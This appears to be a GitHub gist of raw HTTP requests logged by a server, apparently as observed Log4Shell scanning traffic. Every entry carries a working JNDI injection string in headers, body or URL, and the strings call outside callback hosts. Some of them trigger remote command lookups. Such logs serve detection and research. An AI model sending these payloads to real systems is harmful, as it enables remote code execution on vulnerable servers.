POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel 2 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://831f70006f81.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://f684b7afd994.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://27a2a4c5895f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://70aa6f2a62f7.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://7b28da85d1fc.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 Connection: close Content-Length: 85 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip ${jndi:ldap://<IP_ADDRESS>.nb2o4s6kv3njtm2yile8nx12ktqoed.burpcollaborator.net/aaa} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://25db94c8e8f8.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://756c9905a560.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://640ce558d2f7.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://fc9a1761f644.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://5b36e3e5d52c.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://9bd311ec63e8.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://e9d56ea4f086.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://3ce54779494f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://f1a7f7f25a5c.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://35e986ba16e9.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://6de5edddb4c2.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://f89cbcc37a7f.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://60292d90d1b2.bingsearchlib.com:39356/a} 1
GET /$%7Bjndi:ldaps://d03e2367.probe001.log4j.leakix.net:12042/b%7D?${jndi:ldaps://d03e2367.probe001.log4j.leakix.net:12042/b}=${jndi:ldaps://d03e2367.probe001.log4j.leakix.net:12042/b} HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldaps://d03e2367.probe001.log4j.leakix.net:12042/b} Cache-Control: ${jndi:ldaps://d03e2367.probe001.log4j.leakix.net:12042/b} Cookie: ${jndi:ldaps://d03e2367.probe001.log4j.leakix.net:12042/b}=${jndi:ldaps://d03e2367.probe001.log4j.leakix.net:12042/b} X-Leakix: ${jndi:ldaps://d03e2367.probe001.log4j.leakix.net:12042/b} Accept-Encoding: gzip Connection: close 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://831f70006f81.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://e892954b55d5.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://04c54d3672bd.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://009cf07646dc.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://64fbee7e40f0.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://550f7e1deaed.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://1baaa1825889.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://dfc35a10d2b6.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://b109fb0c0221.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://f059b8f500b8.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://923bc36ca25a.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://c4c3b070ea37.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://8d01ae8527fe.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://cc6aed8dbb2d.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://d2916aba9dbc.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://7d90568d1cd1.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://e712032fdde0.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://1cb4ab1f331a.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://d01e6ec48be7.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://2370e1c2d398.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://0b437489cdec.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://9861999f449d.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://282dcef2c41f.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
POST / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 Connection: close Content-Length: 67 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip ${jndi:ldap://c6pa9p4pu896aholv1rgcg3kkhyybkfbn.interactsh.com/aaa} 1
GET /?q=${jndi:ldap://pwn.af:1389//Basic/Command/nslookup+nucleix.226Fa7zGXD9lLYrn3aTodkEPfyc.basic.li466-34.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li466-34.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1389/Basic/Command/nslookup nucleix.226Fa7zGXD9lLYrn3aTodkEPfyc.basic.li466-34.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1389/Basic/Command/nslookup nucleix.226Fa7zGXD9lLYrn3aTodkEPfyc.basic.li466-34.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://c2b5c149509a.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://b095b212c8be.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://650806a900e4.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://efec676fa96c.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1389//Basic/Command/nslookup+nucleix.226Fa8K5hGYSCgXlFFJkpDIlaRW.basic.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1389/Basic/Command/nslookup nucleix.226Fa8K5hGYSCgXlFFJkpDIlaRW.basic.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1389/Basic/Command/nslookup nucleix.226Fa8K5hGYSCgXlFFJkpDIlaRW.basic.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://e61dc3582572.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://4059aa7bbc10.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1337/WebsphereBypass/Dnslog/nucleix.226CYiYfSxnsDAJGggV2pJuvSRd.websphere.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1337/WebsphereBypass/Dnslog/nucleix.226CYiYfSxnsDAJGggV2pJuvSRd.websphere.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1337/WebsphereBypass/Dnslog/nucleix.226CYiYfSxnsDAJGggV2pJuvSRd.websphere.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://813ac90966bc.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://cdcb81168792.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://f4cf2a9b7dba.bingsearchlib.com:39356/a} 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment